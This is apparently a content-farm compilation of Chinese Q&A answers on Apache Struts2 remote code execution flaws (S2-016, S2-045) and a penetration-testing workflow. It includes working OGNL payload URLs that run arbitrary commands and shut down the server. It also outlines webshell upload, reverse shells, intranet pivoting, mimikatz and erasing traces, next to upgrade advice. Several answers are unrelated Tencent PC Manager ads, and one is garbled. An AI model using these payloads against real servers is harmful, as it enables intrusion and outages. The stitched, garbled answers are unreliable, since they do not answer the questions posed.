struts2漏洞016 测试poc,struts2漏洞是什么
struts2漏洞016 测试poc,struts2漏洞是什么详细介绍
本文目录一览: 如何用poc验证一个网站存在struts漏洞
点击系统上的腾讯电脑管家应用程序界面,在主界面中,点击修复漏洞按钮
在漏洞修复界面中,展出可以安装的修复程序列表,如果简单的话,可以直接点击右侧的一键修复按钮
点击漏洞修复界面中的,已安装,就会返回已经安装的漏洞修复程序列表
点击右上方的设置按钮,进行漏洞修复设置
在设置界面中,可以设置程序的安装和修复方式,需要提醒自己,然后进行修复操作
如何检测struts代码执行漏洞
漏洞描述:
CVE-2013-225. Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物
Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令
redirect:和redirectAction:此两项前缀为Struts默认开启功能,目前Struts 2.3.15.1以下版本均存在此漏洞
目前Apache Struts2已经在2.3.15.1中修补了这一漏洞。强烈建议Apache Struts2用户检查您是否受此问题影响,并尽快升级到最新版本
< 参考
1. http://struts.apache.org/release/2.3.x/docs/s2-016.html
>
测试方法:
@Sebug.net dis 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
由于Apache Struts2 在最新修补版本2.3.15.1中已经禁用了重定向参数,因此只要重定向功能仍然有效,则说明受此漏洞影响:
http://host/struts2-showcase/employee/save.action?redirect:http://www.yahoo.com/
如果页面重定向到www.yahoo.com,则表明当前系统受此漏洞影响。
验证表达式解析和命令执行:
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}`
Sebug安全建议:
厂商状态:
厂商已经发布Apache Struts 2.3.15.1以修复此安全漏洞,建议Struts用户及时升级到最新版本。
厂商安全公告:S2-01. 链接:http://struts.apache.org/release/2.3.x/docs/s2-016.html
软件升级页面:http://struts.apache.org/download.cgi#struts23151
目前存在漏洞的公司
乌云上,已经发布了快60个struts的这个漏洞问题,包括腾讯,百度,网易,京东等国内各大互联网公司。(http://www.wooyun.org/bugs/new_submit/)
解决办法:
升级到Struts 2.3.15.1(强烈建议)
使用ServletFilter来过滤有问题的参数(临时替换方案)
参考资料:
这次struts爆出来的漏洞,一大片的网站受的影响,影响最严重的就是电商了.对于struts的漏洞,曾经也写过struts2代码执行漏洞,struts2自从使用OGNL表达式的方式后,经常就会报出一些可怕的漏洞出来,建议那些还是struts的童鞋们,学习一些其他的框架吧!比如,spring mvc,简单,好用,高效!
struts2漏洞是什么
1. Struts2的重定向漏洞
根据Apache给出的漏洞修复方案,只是升级了jar包版本2.3.16
升级完成后所有页面访问都出现了404,如下bug:
There is no Action mapped for namespace [/] and action name [XX!XX] associated with context path....
解决办法:当时好像使用了Dynamic Method Invocation 动态方法调用,然后Struts.xml文件都修改了通配符和占位符匹配。
2. Struts2 OGNL的高危漏洞S-045
Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。
针对此问题做出如下修改:
(1)根据Apache给出的漏洞修复方案,升级Struts2相关jar到2.3.32
(2)关于上传文件部分做出如下验证
<1>上传文件非空验证;
<2>上传文件格式验证;
<3>上传文件验证MimeType;
<4>文件是否可被修改高宽或裁剪(本次项目上传完文件为图片)
<5>文件保存路径重命名。
学习java知识,推荐北京尚学堂,我们拥有多年编程培训经验,会让你在学习的时候快人一步!
测试最新的struts2漏洞 以及怎么拿到shell
问题简单!种问题肯定Action请求路径问题或者边没配置升级版本导致Action请求仔细查看配置路径或者查查2.3版本请求路径特殊配置要求用纠结种问题没析试几路i经或者看看web.xml文件struts2滤器filter配置版本问题升级版本配置文件struts2配置版本信息肯定要跟着换
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
段代码运行低版本struts2项目亲测效获取应用action段代码粘贴于action比
localhost:8080/StrutsTest/goLogin.action确实让web应用服务关闭
网查资料知OGNL引擎代码转义
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
终结 java.lang.Runtime.getRuntime().exit(1);
求神详解转义代码运行流程具体执行程
没有用struts2也会报apache struts2 远程代码执行漏洞这个漏洞,怎么处理
漏洞产生原因主要在于,Struts2 的标签库使用 OGNL 表达式来访问 ActionContext 中的对象数据,为了能够访问到 ActionContext 中的变量,Struts2 将 ActionContext 设置为 OGNL 的上下文,并将 OGNL 的跟对象加入 ActionContext 中。
看看你的架包中是否有带struts2的
Apache Struts2作为世界上最流行的Java Web服务器框架之一,3月7日带来了本年度第一个高危漏洞——CVE编号CVE-2017-5638。其原因是由于Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。
可以在腾讯智慧安全页面申请使用腾讯御点
然后使用这个软件上面的修复漏洞功能
直接对电脑的漏洞进行检测和修复就可以了
一个完整的渗透测试流程,分为那几块,每一块有哪些内容
渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵!
渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——>网络安全法
渗透测试分为 白盒测试 和 黑盒测试
白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透,有点类似于代码分析
黑盒测试就是只告诉我们这个网站的url,其他什么都不告诉,然后让你去渗透,模拟黑客对网站的渗透
我们现在就模拟黑客对一个网站进行渗透测试,这属于黑盒测试,我们只知道该网站的URL,其他什么的信息都不知道。
接下来,我就给大家分享下黑盒渗透测试的流程和思路!
当我们确定好了一个目标进行渗透之后,第一步该做的是什么呢?
信息收集
第一步做的就是信息收集,正所谓知己知彼百战百胜,我们根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。更多的关于信息收集,我在另一篇文章中很详细的介绍了信息收集需要收集哪些信息,以及信息收集过程中需要用到的工具,传送门——> 渗透测试之信息收集
漏洞探测
当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:
SQL注入 , 传送门——>SQL注入详解
XSS跨站脚本 ,传送门——>XSS(跨站脚本)漏洞详解
CSRF跨站请求伪造 , 传送门——>CSRF跨站请求伪造攻击
XXE漏洞,传送门——>XXE(XML外部实体注入)漏洞
SSRF服务端请求伪造漏洞,传送门——>SSRF(服务端请求伪造)漏洞
文件包含漏洞 , 传送门——>文件包含漏洞
文件上传漏洞 , 传送门——>文件上传漏洞
文件解析漏洞,传送门——>文件解析漏洞
远程代码执行漏洞 , 传送门——> 远程代码执行漏洞
CORS跨域资源共享漏洞,传送门——>CORS跨域资源共享漏洞
越权访问漏洞,传送门——>越权访问漏洞
目录浏览漏洞和任意文件读取/下载漏洞,传送门——>目录浏览漏洞和任意文件读取/下载漏洞
struts2漏洞,传送门——>Struts2漏洞
JAVA反序列化漏洞,传送门——>JAVA反序列化漏洞
这些是网站经常发现的一些漏洞,还有一些网站漏洞,这里我就不一一列举出来了。
网站漏洞扫描工具也有很多,比如:
AWVS ,传送门——> AWVS扫描器的用法
AppScan ,传送门——> AppScan扫描器的用法
Owasp-Zap ,传送门——> OWASP-ZAP扫描器的使用
Nessus ,传送门——> Nessus扫描器的使用
网站漏洞扫描工具我就列举这几种,还有很多,最常用的是这几个!
漏洞利用
当我们探测到了该网站存在漏洞之后,我们就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。常用的漏洞利用工具如下:
SQL注入 , 传送门——> Sqlmap的使用
XSS跨站脚本,传送门——> Beef-XSS的使用
抓包改包工具,——> Burpsuite工具的使用 、 Fidder抓包软件的使用
文件上传漏洞,上传漏洞的话,我们一般会上传一句话木马上去,进而再获得webshell,传送门——> Webshell和一句话木马
但是,获得了webshell后,一般权限很低,所以我们需要提权,可以选择反弹一个MSF类型的shell提权,也可以使用其他提权, Windows提权 、 Linux下用SUID提权
内网转发
当我们获取到了网站的Webshell之后,如果我们是想获取该主机的有关信息,我们可以将该主机的webshell换成MSF的shell。直接生成一个木马,然后在菜刀中执行该木马,我们就能接收到一个MSF类型的shell了。
如果我们还想进一步的探测内网主机的信息的话,我们就需要进行内网转发了。我们是不能直接和内网的主机通信的,所以我们就需要借助获取到的webshell网站的服务器和内网主机进行通信。那么,我们怎么借助网站的服务器和内网通信呢,传送门——> 内网转发
内网渗透
当我们能跟内网主机进行通信后,我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描,探测在线的主机,并且探测其使用的操作系统、开放的端口等信息,传送门——> Nmap详解
内网用户基本都是使用的windows系统,而且大多数是使用的windows7,在windows7中有很多漏洞,比如MS17_010这种漏洞,我们可以探测其windows系统是否存在这种漏洞,如果有这种漏洞,直接拿shell。传送门——> Metasploit Framework(MSF)的使用
企业内网大多数是一个域环境。所以,我们只需要找到域控服务器,并拿下其权限,就可以登录其他所有用户的主机了。
当然,内网中也有可能存在供内网使用的内网服务器,我们可以进一步渗透拿下其权限。
至于怎么拿下内网中机器的权限,这要看内网环境了。我这里只是说下大概的一个思路。
相关文章:内网渗透测试之域渗透详解!
内网渗透中mimikatz的使用
痕迹清除
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
我这里只是教大家在渗透进去之后如何清除我们留下的痕迹,以免被网站管理员发现,
撰写渗透测试保告
在完成了渗透测试之后,我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击!
我们做的这一切的一切都是为了营造一个更安全更可信任的网络环境,大家切记不要利用本篇文章进行违法犯罪行为!
渗透测试网站和APP不太一样,以下我介绍一下APP的渗透测试过程吧!
工具
知道创宇安应用
Android(安卓)APP
方法/步骤
组件安全检测。
对Activity安全、Broadcast Receiver安全、Service安全、Content Provider安全、Intent安全和WebView的规范使用检测分析,发现因为程序中不规范使用导致的组件漏洞。
代码安全检测
对代码混淆、Dex保护、SO保护、资源文件保护以及第三方加载库的代码的安全处理进行检测分析,发现代码被反编译和破解的漏洞。
内存安全检测。
检测APP运行过程中的内存处理和保护机制进行检测分析,发现是否存在被修改和破坏的漏洞风险。
数据安全检测。
对数据输入、数据存储、存储数据类别、数据访问控制、敏感数据加密、内存数据安全、数据传输、证书验证、远程数据通信加密、数据传输完整性、本地数据通讯安全、会话安全、数据输出、调试信息、敏感信息显示等过程进行漏洞检测,发现数据存储和处理过程中被非法调用、传输和窃取漏洞。
业务安全检测。
对用户登录,密码管理,支付安全,身份认证,超时设置,异常处理等进行检测分析,发现业务处理过程中的潜在漏洞。
应用管理检测。
1)、下载安装:检测是否有安全的应用发布渠道供用户下载。检测各应用市场是否存在二次打包的恶意应用;
2)、应用卸载:检测应用卸载是否清除完全,是否残留数据;
3)、版本升级:检测是否具备在线版本检测、升级功能。检测升级过程是否会被第三方劫持、欺骗等漏洞;
渗透测试服务流程
1、确定意向。
1)、在线填写表单:企业填写测试需求;
2)、商务沟通:商务在收到表单后,会立即和意向客户取得沟通,确定测试意向,签订合作合同;
2、启动测试。
收集材料:一般包括系统帐号、稳定的测试环境、业务流程等。
3、执行测试。
1)、风险分析:熟悉系统、进行风险分析,设计测试风险点;
2)、漏洞挖掘:安全测试专家分组进行安全渗透测试,提交漏洞;
3)、报告汇总:汇总系统风险评估结果和漏洞,发送测试报告。
4、交付完成。
1)、漏洞修复:企业按照测试报告进行修复;
2)、回归测试:双方依据合同结算测试费用,企业支付费用。
包含以下几个流程:
信息收集
第一步做的就是信息收集,根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。
漏洞探测
当我们收集到了足够多的信息之后,我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞,比如:SQL注入 。
漏洞利用
探测到了该网站存在漏洞之后,就要对该漏洞进行利用了。不同的漏洞有不同的利用工具,很多时候,通过一个漏洞我们很难拿到网站的webshell,我们往往需要结合几个漏洞来拿webshell。
内网渗透
当我们能跟内网主机进行通信后,我们就要开始进行内网渗透了。可以先使用nmap对内网主机进行扫描,探测在线的主机,并且探测其使用的操作系统、开放的端口等信息。
内网中也有可能存在供内网使用的内网服务器,可以进一步渗透拿下其权限。
痕迹清除
达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马。
撰写渗透测试保告
在完成了渗透测试之后,就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞,以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险,防止被黑客攻击。
最近struts2漏洞问题?
参考:http://struts.apache.org/release/2.3.x/docs/s2-017.html
http://struts.apache.org/release/2.3.x/docs/s2-016.html
主要是可以利用STRUTS2漏洞来调取和执行服务器程序或命令!
如何查看apache是否存在struts2 漏洞
建议开启防火墙,然后修复漏洞
试试腾讯电脑管家,杀毒+管理2合1,还可以自动修复漏洞:第一时间发现并修复系统存在的高危漏洞,在不打扰您的情况下自动为系统打上漏洞补丁,轻轻松松将病毒木马拒之门外。自动修复漏洞 电脑管家可以在发现高危漏洞(仅包括高危漏洞,不包括其它漏洞)时,第一时间自动进行修复,无需用户参与,最大程度保证用户电脑安全。尤其适合老人、小孩或计算机初级水平用户使用
struts2 漏洞 怎么防范
可以用腾讯电脑管家,修复漏洞,强大智能的漏洞修复工具,
通过电脑管家提供的修复和优化操作,能够消除风险和优化计算机的性能。
电脑管家建议您每周体检一次,这样可以大大降低被木马入侵的风险。
修补方案:
升级到Struts 2.3.32或Struts 2.5.10.1
Struts 2.3.32下载地址:
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32
如何看待Struts2远程代码执行漏洞的危害
建议腾讯电脑管家修复,系统漏洞经常被黑客利用传播恶意程序(如网页挂马),必须及时修复系统漏洞才能有效防止计算机在上网时被黑客入侵,不过如果安装了安全软件,并且漏洞介绍看起来不是那么严重的话,可以选择不修复。
Windows系统漏洞是指操作系统在开发过程中存在的技术缺陷,这些缺陷可能导致其他用户在未被授权的情况下非法访问或攻击计算机系统。因此,系统开发商一般每月都会发布最新的补丁用以修复新发现的漏洞。目前,腾讯电脑管家支持修复Windows操作系统漏洞和部分第三方软件漏洞。
我们知道这个漏洞是Struts2默认解析上传文件的Content-Type头的过程中出现的问题。struts2如果解析这个头出错,就会执行错误信息中的OGNL代码。该漏洞危害非常大,而且利用成功率高甚至不需要找上传点,自己构造上传包就可以利用,进行远程命令执行。权限自然也基本上属于服务权限,因为你的命令代码是web服务器帮你执行的,它有啥权限,你也就有啥权限。